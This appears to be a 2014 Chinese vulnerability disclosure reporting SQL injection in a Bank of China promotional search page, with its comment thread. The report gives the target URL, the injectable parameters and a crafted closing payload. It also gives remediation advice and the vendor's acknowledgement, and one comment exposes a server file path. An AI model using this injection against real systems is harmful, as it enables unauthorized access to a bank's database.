中国银行某系统存在SQL注入漏洞

跟之前一个一样，在某查询处存在注入

http://e.boc.cn/ehome/SQISOFT/web/webNew/nPromoteSaleSearch.aspx?goodType=1&sno=0001【注入点】&serchStr=【注入点】

正常报错：

构造语句闭合语句：

http://e.boc.cn/ehome/SQISOFT/web/webNew/nPromoteSaleSearch.aspx?goodType=1&sno=0001&serchStr=%27+AND!%3d1+AND+%27a%27%3d%27a

数据库

构造SQL查询时，请使用参数化查询、验证输入对用户输入的数据进行全面安全检查或过滤，尤其注意检查是否包含HTML特殊字符。这些检查或过滤必须在服务器端完成，建议过滤的常见危险字符。

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-09-28 10:04

厂商回复：

非常感谢漏洞作者的发现，我们将尽快修补。

最新状态：

暂无

1. 2014-09-27 17:00 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈，看世间千姿百态...)

   0

   新厂商就是受欢迎。。。。

   1# 回复此人

2. 2014-09-27 17:12 | darkrerror ( 普通白帽子 | Rank:337 漏洞数:53 | 学习)

   0

   @雷锋 人家是大厂商

   2# 回复此人

3. 2014-09-28 16:07 | darkrerror ( 普通白帽子 | Rank:337 漏洞数:53 | 学习)

   1

   中国好厂商 @中国银行

   3# 回复此人

4. 2014-10-23 03:03 | 山羊 ( 路人 | Rank:0 漏洞数:1 | 暂无)

   0

   @darkrerror 我想拜你为师

   4# 回复此人

5. 2014-10-23 08:35 | darkrerror ( 普通白帽子 | Rank:337 漏洞数:53 | 学习)

   0

   @山羊 我是菜b啊:)

   5# 回复此人

6. 2014-11-11 12:50 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

   1

   @darkrerror 我要给你生孩子

   6# 回复此人

7. 2014-11-11 14:04 | darkrerror ( 普通白帽子 | Rank:337 漏洞数:53 | 学习)

   1

   @Damo 我给你生猴子吧 V_v

   7# 回复此人

8. 2014-11-11 15:52 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

   2

   D:/wwwroot/ehome/SQISOFT/web/webNew/ 求删图 洞主你再编辑一下好吗？

   8# 回复此人

9. 2014-11-11 18:08 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

   2

   楼主V5！~~

   9# 回复此人

10. 2014-11-26 20:08 | 山羊 ( 路人 | Rank:0 漏洞数:1 | 暂无)

    2

    @darkrerror 能加我QQ吗？99043846 有事谈

    10# 回复此人